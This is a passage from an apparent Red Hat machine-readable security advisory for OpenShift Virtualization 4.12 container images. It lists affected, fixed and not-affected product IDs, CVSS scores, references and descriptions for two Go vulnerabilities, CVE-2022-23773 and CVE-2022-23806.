"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23773", }, { category: "external", summary: "RHBZ#2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23773", url: "https://www.cve.org/CVERecord?id=CVE-2022-23773", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", }, { cve: "CVE-2022-23806", cwe: { id: "CWE-252", name: "Unchecked Return Value", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053429", }, ], notes: [ { category: "description", text: "A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having a Moderate security impact. The issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7; hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16 & 1.17), will not be addressed in future updates as shipped only in RHEL-7, hence, marked as Out-of-Support-Scope.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", 